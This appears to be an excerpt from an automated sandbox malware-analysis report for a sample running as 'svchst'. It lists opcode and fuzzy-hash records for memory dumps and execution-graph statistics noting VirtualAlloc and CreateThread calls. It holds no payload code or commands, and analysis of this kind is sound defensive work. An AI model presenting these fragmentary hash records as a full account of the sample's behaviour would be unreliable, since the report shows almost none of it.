                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 641640dc9894ae2b38b7d83bab5bbab738a9d500ed207fbef74ac05511ca168d
                                        • Instruction ID: 558570322ea351cbd7fe46a5b9262183d0ec12160e89490d751e4eb572b1a4ee
                                        • Opcode Fuzzy Hash: 641640dc9894ae2b38b7d83bab5bbab738a9d500ed207fbef74ac05511ca168d
                                        • Instruction Fuzzy Hash: 1AF0C478A01228CFCB24DF24D884AD9B7B2FB48300F1041D5E909A3765DB30AE85CF01
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3f0a6c389c707fb77c9a97e9daa6eb949c08af57dabf2581a9bfef757f3a35f0
                                        • Instruction ID: 1338c315c6c3382fcb1f95154cc23823dca7e476da442b1689ec53bda8ad9f82
                                        • Opcode Fuzzy Hash: 3f0a6c389c707fb77c9a97e9daa6eb949c08af57dabf2581a9bfef757f3a35f0
                                        • Instruction Fuzzy Hash: 3BE06D715082849FC702CF64D914E597F70AF0B315F0541D5E8488B2B2C7369D10EB52
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 38c1da0b921ee04f6dd51f00af8fd8b1f13e5b697fcdffa22246a596730eb8b2
                                        • Instruction ID: c218908c98532908714dd2a5e422227939036daad5116e1bd3a9676b26780451
                                        • Opcode Fuzzy Hash: 38c1da0b921ee04f6dd51f00af8fd8b1f13e5b697fcdffa22246a596730eb8b2
                                        • Instruction Fuzzy Hash: 44F09BB09012688FDB64CF64ED88BEDB7B1AB59304F1580EAD509B3260CBB44EC4DF10
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5075d38d505ee6c918a19771304f26e79568bdfd8f9edd783db9bd213f09c3e3
                                        • Instruction ID: 10f63265f85de83f044faa1c7a27910636850944a28d7ad24b8a44d29049f712
                                        • Opcode Fuzzy Hash: 5075d38d505ee6c918a19771304f26e79568bdfd8f9edd783db9bd213f09c3e3
                                        • Instruction Fuzzy Hash: F5E09AB18093889FC302CB74982435E7FB4AB0B304F0544E6D804C7262E2350E00EB41
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b7ea3e7a725bbc3575652fe41efded6f7233aaadbb546cb01960002170684163
                                        • Instruction ID: da4fa499381ba57488c7a9335509f68c44ab10692a513210f39df467c4514331
                                        • Opcode Fuzzy Hash: b7ea3e7a725bbc3575652fe41efded6f7233aaadbb546cb01960002170684163
                                        • Instruction Fuzzy Hash: 11E0C2B18083A18FC3672F90EC143BC3BB06B13305F0610E2E464C64B2C3B80C06C751
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d927e42c45f3ef6bef8deace6abfa041aef23056b73e9668aa71c2c7f822cd37
                                        • Instruction ID: 53319d627d999424f6ac3b266e46cd457541c4a1eb23dbce6b6361462b3272e5
                                        • Opcode Fuzzy Hash: d927e42c45f3ef6bef8deace6abfa041aef23056b73e9668aa71c2c7f822cd37
                                        • Instruction Fuzzy Hash: 40F0A5B4901668CFDF208F54DE88BD9B7B5BB58305F0014D5D109A6250C7B84EC8CE11
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2d590081b7a7bdc1e54cdd5fcb63bd47d6694a82209597c4fb751a69397e9240
                                        • Instruction ID: 0ec5962a1bd9d6c420ce10fcb6f365d54b6d7b4dd902c530d827b99adb5594e9
                                        • Opcode Fuzzy Hash: 2d590081b7a7bdc1e54cdd5fcb63bd47d6694a82209597c4fb751a69397e9240
                                        • Instruction Fuzzy Hash: 3AE0C279A00208EFCB04EFA8D944A9CBBB0FB48300F1081A9E80467320C731AA50DB80
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3a5293003e897e31863190c310183dc6bc959d68833a278514545ca87a86d0a3
                                        • Instruction ID: 89422f6a9f28464765d895cde12b65cf34242fd64de3092c227bc0ca56a865d0
                                        • Opcode Fuzzy Hash: 3a5293003e897e31863190c310183dc6bc959d68833a278514545ca87a86d0a3
                                        • Instruction Fuzzy Hash: EFE09279D0420CEFCB15DF98E844A9DBBB5FB48310F1082AAED1466360D7315AA1EF81
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2738132503.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_5310000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7b2355c946831ded1d2da7a5b5bf99598a6e47e19d10e0de5e798696903c8ae3
                                        • Instruction ID: 79dca37c3366018ab9f96b0fed20936a5294d0fef5f0a0de45783a3f18cf3497
                                        • Opcode Fuzzy Hash: 7b2355c946831ded1d2da7a5b5bf99598a6e47e19d10e0de5e798696903c8ae3
                                        • Instruction Fuzzy Hash: 07E0E5B4E00208EFCB44DFA8D444A9DBBF0FB48300F1081A9D814A3320D7359A00CF80
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2738132503.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_5310000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 56e7a1f847f2a19723b087f642d4cee22f77f6a29c2d1421c6b21404b594e905
                                        • Instruction ID: d70543d8461d405a1c4f98b04605418239fa59a7642967cd2bef2927702722de
                                        • Opcode Fuzzy Hash: 56e7a1f847f2a19723b087f642d4cee22f77f6a29c2d1421c6b21404b594e905
                                        • Instruction Fuzzy Hash: E2E012B0E00308EFCB54DFA8D804A9DBBB5FB48300F5081BAE804A7300D7359A91DF80
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2738132503.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_5310000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 27c7e7c28c8228db7dae04f3d9a06f3650b1f45f80e8fbcb0cdd91541ed1a0f5
                                        • Instruction ID: 322c3309047b0fb342308c44f613f31e637a120f85a84c3a1d14ad988df06823
                                        • Opcode Fuzzy Hash: 27c7e7c28c8228db7dae04f3d9a06f3650b1f45f80e8fbcb0cdd91541ed1a0f5
                                        • Instruction Fuzzy Hash: 07E07574E04208EFCB54DFA8D445A9DBBF4FB48310F1181A9D91897361D7759A41DF81
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2738132503.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_5310000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8d511154b2e1a381d5f20433036d4eb025343f8aac983f77527db8e4921c71db
                                        • Instruction ID: dbfbdaf1ca3a74e6ce8620d4ad3a2814da3405d3cadcf3511910c25068b734ca
                                        • Opcode Fuzzy Hash: 8d511154b2e1a381d5f20433036d4eb025343f8aac983f77527db8e4921c71db
                                        • Instruction Fuzzy Hash: 0DE0E5B4E04208EFCB44DFA8D444A9DBBF0FB48300F1081A9D81893320D7345A00DF81
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fcf211dab203c569651ad61b5b52a66c28e95dbe01544f231ff10ff7004c624f
                                        • Instruction ID: 3b2dd557e2dd5a64ab4956c3f4a63b8986a9d101bac54e5cf69e8fd24a038be3
                                        • Opcode Fuzzy Hash: fcf211dab203c569651ad61b5b52a66c28e95dbe01544f231ff10ff7004c624f
                                        • Instruction Fuzzy Hash: 05E01274D04318EBCB19EFA4E504AADBBB5AB44300F1081AAE89026250C7359AA0EB81
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2738132503.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_5310000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 77d1da178d43937916d92a6906c7e65c803b0c17256808124286cde35f7f083c
                                        • Instruction ID: ffb9306af8ec49305ac522e54e087ba7d21d56617d08f714995dde7066ae4679
                                        • Opcode Fuzzy Hash: 77d1da178d43937916d92a6906c7e65c803b0c17256808124286cde35f7f083c
                                        • Instruction Fuzzy Hash: A8E092B0E04208EFCB94DFA8D54479DBBB5BB48300F1081A9D818A3350D7755A41DF81
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2738132503.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_5310000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7737e001bf1619c8f65a7ae3ca3c3fc296e4bd95216fa87f6d0edac27a113b9d
                                        • Instruction ID: d1818443207163435eec3cb3b25766c9b56b8c7d7fb4f172025000fa2544f8bc
                                        • Opcode Fuzzy Hash: 7737e001bf1619c8f65a7ae3ca3c3fc296e4bd95216fa87f6d0edac27a113b9d
                                        • Instruction Fuzzy Hash: 85E092B4E04218AFCB54DFA8E94479EBBF4BB49300F1082A99818A3350D7745A45DF85
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8292a615f89a3ecd0f803ead46b5782388fa4a226cd93ea53b3601bfe2f915a6
                                        • Instruction ID: 33ce67577f827404e5e2e89f8bdd22ddac2d47252f8f071374502a00957c40b9
                                        • Opcode Fuzzy Hash: 8292a615f89a3ecd0f803ead46b5782388fa4a226cd93ea53b3601bfe2f915a6
                                        • Instruction Fuzzy Hash: 3CE04FA14083E05EE7169774FC1AB5A3FB4AB13318F1A42DAD5E4C65F3C2A5184ADB11
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9279fbff373687d0b4681837436a45548c592bb8be1e48dfd52879e09f635dcd
                                        • Instruction ID: e30b4e45b8bfc80c0f7a911c1fa4355ebb91a453e16a73a3d7e6a0998177dab9
                                        • Opcode Fuzzy Hash: 9279fbff373687d0b4681837436a45548c592bb8be1e48dfd52879e09f635dcd
                                        • Instruction Fuzzy Hash: 89D017B290121CEBDB00EFA0E800B9E77F8EB46204F5105BAD604A3160EF315E109B91
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 59d06b9eb41e41acd1408624916c183c624406a3eb0a3efbb88ba181dc093865
                                        • Instruction ID: 1bbc604d9fe0398f7d80a97d0af5d0f912e5d0d38df3daf18491ab1019cbf6a2
                                        • Opcode Fuzzy Hash: 59d06b9eb41e41acd1408624916c183c624406a3eb0a3efbb88ba181dc093865
                                        • Instruction Fuzzy Hash: 57D017B2901208EFCB04DFA0E808B9E77B8EB4A301F4015FA9509D32A0EB315E44EB91
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6f85e912488f8c870675521f0fc12edb632a28eb37e9999e5c6fd375ec86b2b4
                                        • Instruction ID: c640dab98fe0f478e86b24e9f1830f739ebd3a62234afea7bfff5ba014295d0e
                                        • Opcode Fuzzy Hash: 6f85e912488f8c870675521f0fc12edb632a28eb37e9999e5c6fd375ec86b2b4
                                        • Instruction Fuzzy Hash: 4BE0E275904208EFCB18EFA4E848A9EBBB5BB45301F5082A9EC0426260D7315A65EB91
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 076aef9a1641e3f332f22dc35831550b59bab2d61743174d8b2018dff149c318
                                        • Instruction ID: ad2bae70fa7aa2188f21fbf57861d9623cc61e800cdac66278377f1088a6445a
                                        • Opcode Fuzzy Hash: 076aef9a1641e3f332f22dc35831550b59bab2d61743174d8b2018dff149c318
                                        • Instruction Fuzzy Hash: 24D0C23104D3D04FC3128724AC157693FB05B03304B0A06DAC441865B3C3660009CB21
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2b7cf532486fcf893b7e6c1c0541eba01e84caaa40344926363eeb18650ce658
                                        • Instruction ID: dbf6871bd51b3effa1117b168e9c19ee4010008c00f4c0596fb1a702e301caca
                                        • Opcode Fuzzy Hash: 2b7cf532486fcf893b7e6c1c0541eba01e84caaa40344926363eeb18650ce658
                                        • Instruction Fuzzy Hash: 3FE0B674E00208EFCB44DF98E945A9DFBB4EB88314F1081A9D818A7351D731AE42DF81
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2738132503.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_5310000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b1cf1e0806a5df0c67bbf4e863daa8e885f472af283f2260c510f67cc1a18c50
                                        • Instruction ID: 4acf61663a4c1dbdd274bac01ed540156ffce741a2cd147d18b9f9b26658d96e
                                        • Opcode Fuzzy Hash: b1cf1e0806a5df0c67bbf4e863daa8e885f472af283f2260c510f67cc1a18c50
                                        • Instruction Fuzzy Hash: 80D017B290121CEBE700EFA0A800B9E7BF8AB46200F4145AA9505A7160EF715A109B91
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e337d19d5db13437964315a452c9ecc1d873a10d7a019aefdf98382d40369eaf
                                        • Instruction ID: 0cd3a4c1db73f8dd563115442b03f3a3b9a4770eeac09889f5017d52a360d5fe
                                        • Opcode Fuzzy Hash: e337d19d5db13437964315a452c9ecc1d873a10d7a019aefdf98382d40369eaf
                                        • Instruction Fuzzy Hash: 5EE01275500218EFCB44DF64E904F597B74FB09315F104194F90857361C731ED50EB55
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8e95bfbce387c543a6e6f39351c3a4a6a0975ffd1be1edebb4e3ed2e4d4f8a74
                                        • Instruction ID: 734c13a5a636eef773d774cf6dac7d283108e8096e34a9223120c26f6cace9ad
                                        • Opcode Fuzzy Hash: 8e95bfbce387c543a6e6f39351c3a4a6a0975ffd1be1edebb4e3ed2e4d4f8a74
                                        • Instruction Fuzzy Hash: B8F02BB590522CCFDB218F20DA48BEDBAB5AB58301F1040DA9809A2261D7350FC4DF61
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0947acb8bdd3f48735c101354d1d2fe509f77de2154b25099e54c22d7cdfb604
                                        • Instruction ID: c5cf655db53eb1b14f8d688674d5077564b2e8cb20ed411f0e18451fc93b75bb
                                        • Opcode Fuzzy Hash: 0947acb8bdd3f48735c101354d1d2fe509f77de2154b25099e54c22d7cdfb604
                                        • Instruction Fuzzy Hash: AAE01274900218DFC744DFA4E544A5DBBB4FB49315F1082E9D80867361C7306E44DB81
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2738132503.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_5310000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d066e2685db7dd845a536953aaa393481b1adc0859af4f3c36b5b142ee15f524
                                        • Instruction ID: 49026ebc3e96cbdf7e7055695052775e727b6a347540247dd8bc492c555641bf
                                        • Opcode Fuzzy Hash: d066e2685db7dd845a536953aaa393481b1adc0859af4f3c36b5b142ee15f524
                                        • Instruction Fuzzy Hash: E7E01274904208DBC704DF94E941A5DBB74FB45304F1081A9D80957351C7715E42DB81
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8667bfb2aff4e40b65156179929383743b6546819b39c159bf95e73f2f3bbd9a
                                        • Instruction ID: a2cfb57ae8c2145484fa11018e4439e0c5f065df0ea4c5b7e3405f1f3df52562
                                        • Opcode Fuzzy Hash: 8667bfb2aff4e40b65156179929383743b6546819b39c159bf95e73f2f3bbd9a
                                        • Instruction Fuzzy Hash: 3EE04874901228DBDF218F90DE88BEEBBB1BB18300F1091D5E50AA6260D7321E81EF00
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a664b0217bbaa8b6e265b7196c224951331d6a00343a762c82342c0bb0efd61f
                                        • Instruction ID: 8abb5cc5beb70ffe59a96210228c989fca09b25787a8789c59f4b9d6e5b37d0d
                                        • Opcode Fuzzy Hash: a664b0217bbaa8b6e265b7196c224951331d6a00343a762c82342c0bb0efd61f
                                        • Instruction Fuzzy Hash: 1AD0C9B5945218EFD790DFA8E90875EB7F8EB09305F118AA5AC09D3260E7715E00EB91
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2738132503.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_5310000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b51f88a187edfcd6373ea7aad90c5044438121f768ee81dc47a4665a78fcaf1f
                                        • Instruction ID: 5fb640924f5c9316d296d9041840541e40ab99f32b422c2bb4fe3aeec8bcde37
                                        • Opcode Fuzzy Hash: b51f88a187edfcd6373ea7aad90c5044438121f768ee81dc47a4665a78fcaf1f
                                        • Instruction Fuzzy Hash: 94D05EB0C04258DBCB54DFA4E90876CBFB4AB01201F1001A9D84522351E7740A44DB91
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93763118b0231b61df42e8f2ab0b8467a2683934e499fc2a42992991ddf34893
                                        • Instruction ID: 0e7d6b53a6d9b8b3d51442a94d42d49cb47fca675e6d735c73e6500b47ec87fc
                                        • Opcode Fuzzy Hash: 93763118b0231b61df42e8f2ab0b8467a2683934e499fc2a42992991ddf34893
                                        • Instruction Fuzzy Hash: 0BD0527504D3D08FC32A8B79ACA871D3F70AF13318B0A0AEED894860B3D3A11809DB01
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fb36b30f0d0c57016896f881a7f397c4260ab85055176f5e26c81d651a2e48fc
                                        • Instruction ID: 44779b26f10e8d79ef2f5cee26ed33fbdce84135da37b738b5effa39bf716bf5
                                        • Opcode Fuzzy Hash: fb36b30f0d0c57016896f881a7f397c4260ab85055176f5e26c81d651a2e48fc
                                        • Instruction Fuzzy Hash: 0CD0C7F14047B45AEB1957A4F80A76B3BB85301319F4551A5D798415A2C7A51C84CA51
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: daba6023693a545911f1f1f9a5033e8ead463818d6563cee374816531e7ef000
                                        • Instruction ID: 48ece23b5424b7b8584d687aff8e85b2e7c18a6e95cf7b979b1a24290c8f4a87
                                        • Opcode Fuzzy Hash: daba6023693a545911f1f1f9a5033e8ead463818d6563cee374816531e7ef000
                                        • Instruction Fuzzy Hash: 2FB022B00003288BC2282F80FC0C33A32ACA30230AF802820A22C008B28BB00820C280
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c8e53e663c5e77d15a6fd19fd710443e59e49d4de98912267101437a4296b14c
                                        • Instruction ID: 985a6b44429baec9e4ec7d9988cc3eda8df22dd6eed79db306b39c5f48b1003d
                                        • Opcode Fuzzy Hash: c8e53e663c5e77d15a6fd19fd710443e59e49d4de98912267101437a4296b14c
                                        • Instruction Fuzzy Hash: ABC012B09002149FEB14DB64DE88BBA7B75ABC8304F049085A209A2124CB340DC08E24
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ff008be9bcfe5656ec1fb6c2f341fcd6caf3b8f64835dc059728867c28ecad3e
                                        • Instruction ID: bbe933fb6ef6d243eac22b271027cb14bb715388fc7add639bf8884219672dcf
                                        • Opcode Fuzzy Hash: ff008be9bcfe5656ec1fb6c2f341fcd6caf3b8f64835dc059728867c28ecad3e
                                        • Instruction Fuzzy Hash: 63D0C970805258CFEB50CF88E444B9CBBB1EB09311F62589AD405B2292C3B19CC88F01
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d625e61de89ad489c124a4073226bb93c3f3c16e8061e7b54426308dc18a1af4
                                        • Instruction ID: 54235f52182638dabef96c76f4d1005573192878e4efd6de38f4ddaea282ca4f
                                        • Opcode Fuzzy Hash: d625e61de89ad489c124a4073226bb93c3f3c16e8061e7b54426308dc18a1af4
                                        • Instruction Fuzzy Hash: DDC00238A46728CBEB208B10DC8CF9DBB36BB99701F2050C5D80D363A1C6701E84DE00
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 97809fe3f134af47cac6860b9470fb6c1a56107c555a4168f3dac039bc8ffaa6
                                        • Instruction ID: f3aaea4e28eb45030a29b75dda3242ac97672fe97b9e732cb25a7d823edfaa58
                                        • Opcode Fuzzy Hash: 97809fe3f134af47cac6860b9470fb6c1a56107c555a4168f3dac039bc8ffaa6
                                        • Instruction Fuzzy Hash: BBC00234804228CBEF254B50DD88BDDBB76BB48305F1050C59419662618A750AD4EF10

                                        Execution Graph

                                        Execution Coverage:15.5%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:6
                                        Total number of Limit Nodes:0
                                        execution_graph 18033 4ea3e18 18034 4ea3e60 VirtualAlloc 18033->18034 18035 4ea3ecc 18034->18035 18030 4ea4040 18031 4ea408d CreateThread 18030->18031 18032 4ea410f 18031->18032

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
